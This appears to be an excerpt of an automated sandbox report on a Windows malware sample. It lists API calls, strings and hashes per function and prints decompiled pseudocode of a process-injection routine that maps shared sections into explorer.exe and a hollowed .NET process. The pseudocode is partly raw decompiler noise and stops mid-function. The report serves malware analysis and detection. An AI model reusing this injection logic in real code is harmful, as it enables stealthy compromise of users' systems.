_allmul.NTDLL(?,?,?,00000000), ref: 000D201C
_allmul.NTDLL(?,00000000,00000000,?), ref: 000D204F
_allmul.NTDLL(000C2F96,00000000,?,?), ref: 000D20A3

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: _allmul
String ID:
API String ID: 4029198491-0
Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction ID: 9144efb82fa305878f8d52ffc02de211bc2b687841bbda20d484635bae05990e
Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction Fuzzy Hash: C6A17C70708701ABD724EF64C881A6EB7E6AFE8744F00492EF69587352DB71EC458B62

Uniqueness

Uniqueness Score: -1.00%

Function 000D76C7 Relevance: 5.2, APIs: 4, Instructions: 227COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?), ref: 000D7787
memset.NTDLL ref: 000D7798
memcpy.NTDLL(?,?,?), ref: 000D780E
memset.NTDLL ref: 000D7822

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: c619ea2c298dd9c75116f67c9c0684c188a810f16eda2788c5e90550f24386e1
Instruction ID: 76f32bc114c6e5fe92c5d080c38318c02539148e8d4b6178b48de19e484cfb92
Opcode Fuzzy Hash: c619ea2c298dd9c75116f67c9c0684c188a810f16eda2788c5e90550f24386e1
Instruction Fuzzy Hash: 7C81837160C3149FC354DF29C884A6BB7E5BF98704F54496EF48997352E770E904CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 000C1AD3 Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000000,000C28F3), ref: 000C1AF3
lstrlen.KERNEL32(00000000,?,?,?,00000000,000C28F3), ref: 000C1AF8
lstrcat.KERNEL32(00000000,?), ref: 000C1B0E
lstrcat.KERNEL32(00000000,00000000), ref: 000C1B12

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: d6a1b194497ade2a750fcc602124ac91f2e8ffc3674155da217dbda1588348dd
Instruction ID: d7fcfdb65836526488b92c18692cefb27b7f42078f59c4f82890ac31c50bcbe7
Opcode Fuzzy Hash: d6a1b194497ade2a750fcc602124ac91f2e8ffc3674155da217dbda1588348dd
Instruction Fuzzy Hash: 19E092A270421C2B472477AE5C84EFF76DCCFCA6A13060139FA08D3203EE96AC0186B0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 3444, Parent PID: 4012COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	77
Total number of Limit Nodes:	7

Executed Functions

Function 00252C34 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Microsoft.NET\Framework\, xrefs: 00252FDB
m.ex, xrefs: 00252FCD
D, xrefs: 00253045
egas, xrefs: 00252FC6
e, xrefs: 00252FD4

Memory Dump Source

Source File: 00000013.00000002.1135558233.0000000000250000.00000040.00001000.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_250000_vbc.jbxd

Similarity

API ID:
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 0-1087957892
Opcode ID: 7dedae8e35398986174414f77deba81bdc27b61a9c1b597510ad186c0c01245d
Instruction ID: b0a1b1354e65e44ffa17ac83c2eb65af79d20107d0f4334ed745015ce66ebd6f
Opcode Fuzzy Hash: 7dedae8e35398986174414f77deba81bdc27b61a9c1b597510ad186c0c01245d
Instruction Fuzzy Hash: 20E14B72D1065AAFCF11DFE4CC81AEDBBB8EF04345F14806AE918A7641D7309A69CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00252CA6 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 369
nativeprocessthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00252E92
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00252EBF
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0025306A
NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 002530AF
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 002530D9
NtUnmapViewOfSection.NTDLL(?,?), ref: 002530F4
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0025310D
NtResumeThread.NTDLL(?,00000000), ref: 0025314B

Strings

\Microsoft.NET\Framework\, xrefs: 00252FDB
m.ex, xrefs: 00252FCD
D, xrefs: 00253045
egas, xrefs: 00252FC6
e, xrefs: 00252FD4

Memory Dump Source

Source File: 00000013.00000002.1135558233.0000000000250000.00000040.00001000.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_250000_vbc.jbxd

Similarity

API ID: Section$View$CreateMemoryVirtual$ProcessReadResumeThreadUnmapWrite
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 615172284-1087957892
Opcode ID: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
Instruction ID: b06216b4dc847c8b416f878a57e33b1d51e358aabd3476c787d49070ac39fb68
Opcode Fuzzy Hash: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
Instruction Fuzzy Hash: 71E12872D1065AAFCF11DFE5CC81AAEBBB4FF04345F14806AE918A7241D7309A69CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0025231B Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 356
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00252E92
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00252EBF

Strings

\Microsoft.NET\Framework\, xrefs: 00252FDB
m.ex, xrefs: 00252FCD
D, xrefs: 00253045
egas, xrefs: 00252FC6
e, xrefs: 00252FD4

Memory Dump Source

Source File: 00000013.00000002.1135558233.0000000000250000.00000040.00001000.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_250000_vbc.jbxd

Similarity

API ID: Section$CreateView
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 1585966358-1087957892
Opcode ID: e5b3c6fdb99f7b6ee653007ef954c3259422cb049f75106ab78c0b26249ff7a6
Instruction ID: 3a4f8ec9b9f937ac1e42717f9facb06196dd71d809465b460d428548b7399ee0
Opcode Fuzzy Hash: e5b3c6fdb99f7b6ee653007ef954c3259422cb049f75106ab78c0b26249ff7a6
Instruction Fuzzy Hash: 3FD13872D1065AAFCF11DFE5CC81AEEBBB4BF04345F14806AE918A7241D7309A69CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00252CA3 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 354
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00252E92
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00252EBF

Strings

\Microsoft.NET\Framework\, xrefs: 00252FDB
m.ex, xrefs: 00252FCD
D, xrefs: 00253045
egas, xrefs: 00252FC6
e, xrefs: 00252FD4

Memory Dump Source

Source File: 00000013.00000002.1135558233.0000000000250000.00000040.00001000.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_250000_vbc.jbxd

Similarity

API ID: Section$CreateView
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 1585966358-1087957892
Opcode ID: d869fe1dfd7ba8462786ba5dc0f5c93caae51ad8bd938814b7fffa88b8461c4a
Instruction ID: 663fcf5af5c61ef41610bb826e54b3f25c983b0eb60adf0c689c72204ee666d5
Opcode Fuzzy Hash: d869fe1dfd7ba8462786ba5dc0f5c93caae51ad8bd938814b7fffa88b8461c4a
Instruction Fuzzy Hash: 64D13872D1065AAFCF11DFE5CC81AEEBBB4BF04345F14806AE918A7241D7309A69CF58

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 3776, Parent PID: 1860COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 000638B0 Relevance: 1.5, APIs: 1, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 000638F2

Memory Dump Source

Source File: 00000014.00000002.1129305983.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_61000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
Instruction ID: 07d7c0bebfd5eab35338b42f632c169550439883b7608d4425e9f1fe2b024cbe
Opcode Fuzzy Hash: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
Instruction Fuzzy Hash: F3F0A020F11A080FEAAC77FD685D3A822C2EB59310F900629B516C36D3DC398A458352

Uniqueness

Uniqueness Score: -1.00%

Function 00063458 Relevance: 6.2, APIs: 4, Instructions: 172
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.SHLWAPI ref: 0006347E
RegOpenKeyExW.KERNEL32 ref: 0006353F
RegEnumKeyExW.KERNEL32 ref: 000635D6
RegCloseKey.KERNEL32 ref: 000635E9

Memory Dump Source

Source File: 00000014.00000002.1129305983.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_61000_explorer.jbxd

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
Instruction ID: d4483960c43caaeea037d42a9e10a4b875f7596f5693c41f599e3ec46e3d9013
Opcode Fuzzy Hash: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
Instruction Fuzzy Hash: 82416C30718F0C4FDB98EF6D94997AAB6E2FBD8341F04456EA14EC3262DE34D9448782

Uniqueness

Uniqueness Score: -1.00%

Function 0006A298 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0006A397
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006A441
VirtualProtect.KERNELBASE ref: 0006A45F

Memory Dump Source

Source File: 00000014.00000002.1129305983.0000000000069000.00000040.80000000.00040000.00000000.sdmp, Offset: 00069000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_69000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction ID: 006bc09559ba58e1e56ca86166064d69eaa2f5b492dea585316237ca25ff1824
Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction Fuzzy Hash: 99517D3175892E4BCB24BB7C9CC42F5B3C3F757321B18062AD08AD3385D559D9468B93

Uniqueness

Uniqueness Score: -1.00%

Function 0006372C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32 ref: 000637B2

Strings

?, xrefs: 000637A2

Memory Dump Source

Source File: 00000014.00000002.1129305983.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_61000_explorer.jbxd

Similarity

API ID: Create
String ID: ?
API String ID: 2289755597-1684325040
Opcode ID: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
Instruction ID: 0175cadc1eaba084e880b185854f7669454e214051596b44bd1488a6f786bdce
Opcode Fuzzy Hash: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
Instruction Fuzzy Hash: 9E11B970608B4C8FD750DF69D48865AB7E2FB98305F40062EE489C3321DF34D985CB82

Uniqueness

Uniqueness Score: -1.00%

Function 000622B4 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32 ref: 000622D0

Memory Dump Source

Source File: 00000014.00000002.1129305983.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_61000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction ID: 6c511f69b69d8d3de49810070f3f7e1f5989998c8ca95c8496505d4ba7d4b445
Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction Fuzzy Hash: 7AE08C30108B0A8FD798AFBCE4CA07933A1EB9C252B05093EE005CB114D27988C18741

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rirjijjPID: 4004, Parent PID: 3712COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040158A Relevance: 10.8, APIs: 7, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040158A(void* __eax, void* __ebx, void* __ecx, signed char __edx, signed int* __esi) {
				signed char _t116;
				signed int _t120;
				signed int _t123;
				intOrPtr _t124;
				struct _GUID _t131;
				signed int _t132;
				struct _GUID _t133;
				PVOID* _t135;
				PVOID* _t137;
				signed char _t138;
				void* _t139;
				intOrPtr* _t141;
				PVOID* _t156;
				signed int _t157;
				PVOID* _t158;
				signed int _t159;
				void* _t162;
				intOrPtr _t163;
				void* _t168;
				signed int* _t170;
				signed int _t177;
				int _t178;
				signed char _t195;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				void* _t203;
				signed int _t204;
				void* _t207;
				void* _t214;
				long _t215;
				signed int _t217;
				void* _t218;
				signed int* _t226;
				HANDLE* _t227;
				HANDLE* _t229;
				void* _t234;
				signed int _t237;
				void* _t239;
				void* _t240;
				void* _t242;
				intOrPtr* _t245;
				void* _t248;
				signed int _t250;

				L0:
				while(1) {
					L0:
					_t226 = __esi;
					_t195 = __edx;
					_t162 = __ebx;
					_t116 = __ecx + 4;
					_t250 = _t116 & 0x00000087;
					if(_t250 <= 0) {
						break;
					}
					L30:
					gs = __esi;
					__al = __al + 0x8e;
					 *__ebx = (__edx << 0x00000020 |  *__ebx) >> __cl;
					asm("popfd");
					__eax = __eax + 0xbec00404;
					__ecx = __ecx +  *((intOrPtr*)(__esi - 0x10498f04));
					__eflags = __ecx;
					while(1) {
						L31:
						asm("cld");
						if(__eflags < 0) {
							break;
						}
						L32:
						asm("out dx, eax");
						if(__eflags < 0) {
							continue;
						} else {
							L33:
							asm("adc ah, bh");
							__eflags = __al - 0xbe;
							asm("psubq mm7, mm3");
							asm("sti");
							asm("sti");
							asm("movsd");
							asm("movsb");
							asm("lodsb");
							asm("lodsd");
							asm("adc edi, [esi+eax]");
							__al = __al + 4;
							__eflags = __al;
							asm("adc ch, dh");
							if(__al < 0) {
								L21:
								__eax = __eax + 0x76560404;
								__eflags = __eax;
								while(1) {
									L22:
									__al = __al + 0x56;
									__eflags = __al;
									if(__al <= 0) {
										break;
									}
									L23:
									__esi = __esi +  *((intOrPtr*)(__edx - 7));
									__eflags = __esi;
									L24:
									while(__eflags >= 0) {
										if(__eflags <= 0) {
											L7:
											asm("in al, dx");
											__al = __al | 0x00000053;
											_push(__esi);
											_push(__edi);
											goto L10;
										} else {
											L26:
											_pop(es);
											if(__eflags < 0) {
												continue;
											} else {
												L27:
												if(__eflags <= 0) {
													L10:
													asm("hlt");
													__eax = 0x1554;
													__ecx = 0x8d;
													__eax = L004012ED(__eax, __ebx, __ecx, __edi, __esi, __eflags);
													if(__eflags < 0) {
														L3:
														_t226[4] = _t226[4] & 0xf6108b0f;
														return _t116;
													} else {
														L15:
														asm("repe retf 0x723b");
														goto L16;
													}
												} else {
													L28:
													asm("bswap edx");
													__dl = __dl ^  *(__ecx - 0x34046c01);
													__eflags = __dl;
													L29:
													_t16 = __eax;
													__eax = __ebx;
													__ebx = _t16;
													asm("sti");
													asm("retf");
													asm("sti");
													asm("sti");
													__eflags = __eax & 0x0491abaa;
													goto L0;
												}
											}
										}
										goto L107;
									}
								}
								L6:
								_t6 = __ebp - 0x77;
								 *_t6 =  *(__ebp - 0x77) + __dl;
								__eflags =  *_t6;
							} else {
								L34:
								asm("rol byte [0xeeaf439f], 0xfb");
								asm("sti");
								asm("adc dh, bh");
								0xf710();
								goto L35;
							}
						}
						L107:
					}
					L16:
					if (__eflags < 0) goto L5;
					__esi = 0xefb6700f;
				}
				L35:
				__eflags =  *(_t116 - 0x7f) & 0xfb76428e;
				asm("sti");
				asm("sti");
				asm("adc dh, bh");
				asm("int3");
				__eflags = _t195 &  *_t116;
				_push(cs);
				if(__eflags > 0) {
					asm("pushad");
					_push(_t162);
					_push(_t226);
					_push(_t214);
					_t168 = 0x373;
					L004012ED(0x161c, _t162, _t168, _t214, _t226, __eflags);
					_t163 =  *((intOrPtr*)(_t242 + 8));
					_t215 = 0;
					 *(_t242 - 0x34) = 0;
					__eflags = gs;
					if(gs != 0) {
						_t31 = _t242 - 0x34;
						 *_t31 =  *(_t242 - 0x34) + 1;
						__eflags =  *_t31;
					}
					while(1) {
						_t120 =  *((intOrPtr*)(_t163 + 0x48))();
						__eflags = _t120;
						if(_t120 != 0) {
							break;
						}
						 *((intOrPtr*)(_t163 + 0x1c))(0x3e8);
					}
					 *(_t242 - 0x5c) = _t120;
					_t227 = _t242 - 0x60;
					 *_t227 = _t215;
					 *((intOrPtr*)(_t163 + 0x4c))(_t120, _t227);
					_t123 =  *_t227;
					__eflags = _t123;
					if(__eflags != 0) {
						_t170 = _t242 - 0x30;
						 *_t170 = _t123;
						_t170[1] = _t215;
						_t227 = _t242 - 0x28;
						 *((intOrPtr*)(_t163 + 0x10))(_t227, 0x18);
						 *_t227 = 0x18;
						__eflags =  *((intOrPtr*)(_t163 + 0x70))(_t242 - 0x10, 0x40, _t227, _t242 - 0x30);
						if(__eflags == 0) {
							__eflags = NtDuplicateObject( *(_t242 - 0x10), 0xffffffff, 0xffffffff, _t242 - 0xc, _t215, _t215, 2);
							if(__eflags == 0) {
								 *(_t242 - 8) = _t215;
								_t131 = _t242 - 0x50;
								 *(_t131 + 4) = _t215;
								 *_t131 = 0x5000;
								_t229 = _t242 - 0x54;
								_t132 = NtCreateSection(_t229, 6, _t215, _t131, 4, 0x8000000, _t215);
								__eflags = _t132;
								if(_t132 == 0) {
									 *_t53 =  *(_t242 - 0x50);
									_t156 = _t242 - 0x44;
									 *_t156 = _t215;
									_t157 = NtMapViewOfSection( *_t229, 0xffffffff, _t156, _t215, _t215, _t215, _t242 - 0x38, 1, _t215, 4);
									__eflags = _t157;
									if(_t157 == 0) {
										_t158 = _t242 - 0x3c;
										 *_t158 = _t215;
										_t159 = NtMapViewOfSection( *_t229,  *(_t242 - 0xc), _t158, _t215, _t215, _t215, _t242 - 0x38, 1, _t215, 4);
										__eflags = _t159;
										if(_t159 == 0) {
											_t240 =  *(_t242 - 0x44);
											 *((intOrPtr*)(_t163 + 0x20))(_t215, _t240, 0x104);
											 *((intOrPtr*)(_t240 + 0x208)) =  *((intOrPtr*)(_t242 + 0x14));
											_t65 = _t242 - 8;
											 *_t65 =  *(_t242 - 8) + 1;
											__eflags =  *_t65;
										}
									}
								}
								_t133 = _t242 - 0x50;
								 *(_t133 + 4) = _t215;
								 *_t133 =  *((intOrPtr*)(_t242 + 0x10)) + 0x10000;
								_t227 = _t242 - 0x58;
								__eflags = NtCreateSection(_t227, 0xe, _t215, _t133, 0x40, 0x8000000, _t215);
								if(__eflags == 0) {
									__eflags =  *(_t242 - 8);
									if(__eflags != 0) {
										 *_t74 =  *(_t242 - 0x50);
										_t135 = _t242 - 0x48;
										 *_t135 = _t215;
										__eflags = NtMapViewOfSection( *_t227, 0xffffffff, _t135, _t215, _t215, _t215, _t242 - 0x38, 1, _t215, 4);
										if(__eflags == 0) {
											_t137 = _t242 - 0x40;
											 *_t137 = _t215;
											_t138 = NtMapViewOfSection( *_t227,  *(_t242 - 0xc), _t137, _t215, _t215, _t215, _t242 - 0x38, 1, _t215, 0x20);
											__eflags = _t138;
											if(__eflags == 0) {
												L58();
												if(__eflags == 0 && __eflags != 0) {
													__eflags = (_t138 | 0x00000006) - 1;
												}
												_t248 = _t245 + 4;
												_t198 = 0x2260;
												_t139 = _t198;
												_t199 = _t198 << 5;
												_t200 = _t199 + _t139;
												asm("lodsb");
												_t201 = _t200;
												asm("loop 0xffffffc8");
												_t202 = _t201 ^ 0xd2aedb1b;
												_t245 = _t248 - _t202;
												_t234 =  *((intOrPtr*)(_t242 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t242 + 0xc))));
												_t177 =  *(_t234 + 6) & 0x0000ffff;
												_push(_t234);
												_t203 = _t234;
												__eflags =  *(_t242 - 0x34);
												if( *(_t242 - 0x34) == 0) {
													_t204 = _t203 + 0xf8;
													__eflags = _t204;
												} else {
													_t204 = _t203 + 0x108;
												}
												_push(_t177);
												_t178 =  *(_t204 + 0x10);
												__eflags = _t178;
												if(_t178 != 0) {
													_t239 =  *((intOrPtr*)(_t204 + 0x14)) +  *((intOrPtr*)(_t242 + 0xc));
													__eflags = _t239;
													memcpy( *((intOrPtr*)(_t204 + 0xc)) +  *(_t242 - 0x48), _t239, _t178);
													_t245 = _t245 + 0xc;
												}
												asm("loop 0xffffffe6");
												_pop(_t227);
												__eflags =  *(_t242 - 0x34);
												if(__eflags == 0) {
													_push(_t227);
													_t207 = _t227[0xd] -  *(_t242 - 0x40);
													_t237 = _t227[0x28] +  *(_t242 - 0x48);
													__eflags = _t237;
													while(1) {
														__eflags =  *_t237;
														if( *_t237 == 0) {
															break;
														}
														_t217 =  *_t237;
														_t237 = _t237 + 8;
														asm("lodsw");
														__eflags = 0;
														if(0 != 0) {
															 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t207;
															__eflags =  *(0 +  *(_t242 - 0x48) + _t217);
														}
														asm("loop 0xffffffe9");
													}
													_pop(_t227);
													_t215 = 0;
													__eflags = 0;
													_t141 = _t242 - 4;
													 *_t141 = 0;
													 *((intOrPtr*)(_t163 + 0x98))( *(_t242 - 0xc), 0, 0, 0, 0, 0, _t227[0xa] +  *(_t242 - 0x40),  *(_t242 - 0x3c), _t141, 0);
												} else {
													L91();
													_pop(_t218);
													_t215 = _t218 - 0x188d;
													 *((intOrPtr*)(_t215 + 0x18c1)) = _t215 + 0x2d60;
													L0040137F(_t163, _t215 + 0x18c1, _t215, _t227, __eflags, _t215 + 0x2d60, 0x1ad);
													0x33();
													 *((intOrPtr*)(_t215 + 0x18e6)) = _t215 + 0x2db0;
													0x33();
												}
											}
										}
									}
								}
							}
						}
					}
					_push(0x161c);
					_t124 =  *_t245;
					return L004012ED(_t124, _t163, 0x373, _t215, _t227, __eflags);
				} else {
					__eflags =  *_t226 & 0x458b0404;
					asm("hlt");
					return _t116;
				}
				goto L107;
			}

Memory Dump Source

Source File: 00000015.00000002.1147242953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_rirjijj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d0989fea8294b14a6dc720ca75137b93c28906a5ee7e3f13ef78b41e45cdf0
Instruction ID: 69b6f79ff3be7928d4a27c65b721351c97b8d1c4a2a9cb26b6f1864a1e830558
Opcode Fuzzy Hash: 47d0989fea8294b14a6dc720ca75137b93c28906a5ee7e3f13ef78b41e45cdf0
Instruction Fuzzy Hash: 4981C0B1900205BFEB208F95CC49FEB7BB9FF85710F14012AF952BA1E0D2789902CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015EB Relevance: 10.7, APIs: 7, Instructions: 194
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E004015EB(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t89;
				void* _t92;
				intOrPtr _t93;
				struct _GUID _t100;
				struct _GUID _t102;
				PVOID* _t104;
				PVOID* _t106;
				void* _t108;
				intOrPtr* _t110;
				PVOID* _t125;
				PVOID* _t127;
				void* _t131;
				intOrPtr _t132;
				void* _t134;
				void** _t136;
				signed int _t143;
				int _t144;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				void* _t170;
				void* _t177;
				long _t178;
				intOrPtr _t180;
				void* _t181;
				void* _t188;
				HANDLE* _t189;
				HANDLE* _t191;
				void* _t196;
				intOrPtr* _t199;
				intOrPtr _t202;
				intOrPtr* _t203;
				void* _t205;
				long _t220;

				asm("pushad");
				_push(_t131);
				_push(_t188);
				_push(_t177);
				_t134 = 0x373;
				L004012ED(0x161c, _t131, _t134, _t177, _t188, __eflags);
				_t132 = _a4;
				_t178 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t132 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t132 + 0x1c))(0x3e8);
				}
				_v96 = _t89;
				_t189 =  &_v100;
				 *_t189 = _t178;
				 *((intOrPtr*)(_t132 + 0x4c))(_t89, _t189);
				_t92 =  *_t189;
				if(_t92 != 0) {
					_t136 =  &_v52;
					 *_t136 = _t92;
					_t136[1] = _t178;
					_t189 =  &_v44;
					 *((intOrPtr*)(_t132 + 0x10))(_t189, 0x18);
					 *_t189 = 0x18;
					_push( &_v52);
					_push(_t189);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t132 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t178, _t178, 2) == 0) {
						_v12 = _t178;
						_t100 =  &_v84;
						 *(_t100 + 4) = _t178;
						 *_t100 = 0x5000;
						_t191 =  &_v88;
						if(NtCreateSection(_t191, 6, _t178, _t100, 4, 0x8000000, _t178) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t125 =  &_v72;
							 *_t125 = _t178;
							if(NtMapViewOfSection( *_t191, 0xffffffff, _t125, _t178, _t178, _t178,  &_v60, 1, _t178, 4) == 0) {
								_t127 =  &_v64;
								 *_t127 = _t178;
								if(NtMapViewOfSection( *_t191, _v16, _t127, _t178, _t178, _t178,  &_v60, 1, _t178, 4) == 0) {
									_t202 = _v72;
									 *((intOrPtr*)(_t132 + 0x20))(_t178, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t102 =  &_v84;
						 *(_t102 + 4) = _t178;
						 *_t102 = _a12 + 0x10000;
						_t189 =  &_v92;
						if(NtCreateSection(_t189, 0xe, _t178, _t102, 0x40, 0x8000000, _t178) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t46);
							_t104 =  &_v76;
							 *_t104 = _t178;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t104, _t178, _t178, _t178,  &_v60, 1, _t178, 4) == 0) {
								_t106 =  &_v68;
								 *_t106 = _t178;
								_t220 = NtMapViewOfSection( *_t189, _v16, _t106, _t178, _t178, _t178,  &_v60, 1, _t178, 0x20);
								if(_t220 == 0) {
									L22();
									if(_t220 == 0 && _t220 != 0) {
									}
